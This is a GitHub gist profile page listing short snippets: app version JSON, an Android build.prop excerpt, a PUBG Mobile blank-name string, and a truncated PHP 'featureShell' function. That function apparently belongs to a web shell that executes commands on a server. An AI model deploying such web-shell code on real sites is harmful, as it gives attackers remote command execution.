Skip to content

Instantly share code, notes, and snippets.

View herrye991's full-sized avatar
💭
I may be slow to respond.

Herry Mandala herrye991

💭
I may be slow to respond.
  • West Borneo, Indonesia
  • 22:27 (UTC +07:00)
View GitHub Profile
{
"customer": "1.0.23",
"sales": "1.0.15"
}
<?php
function featureShell($cmd, $cwd) {
$stdout = array();
if (preg_match("/^\s*cd\s*$/", $cmd)) {
// pass
} elseif (preg_match("/^\s*cd\s+(.+)\s*(2>&1)?$/", $cmd)) {
chdir($cwd);
preg_match("/^\s*cd\s+([^\s]+)\s*(2>&1)?$/", $cmd, $match);
# begin build properties
# autogenerated by buildinfo.sh
ro.build.id=NJH47F
ro.build.display.id=NJH47F
ro.build.version.incremental=eng.b--b.20170821.194623
ro.build.version.sdk=22
ro.build.version.codename=REL
ro.build.version.all_codenames=REL
ro.build.version.release=5.1.1
ro.build.version.security_patch=2017-08-05
@herrye991
herrye991 / Blank_name.txt
Last active May 12, 2020 08:54
PUBG_MOBILE
ūſſāēīōū
Source : https://github.com/herrye991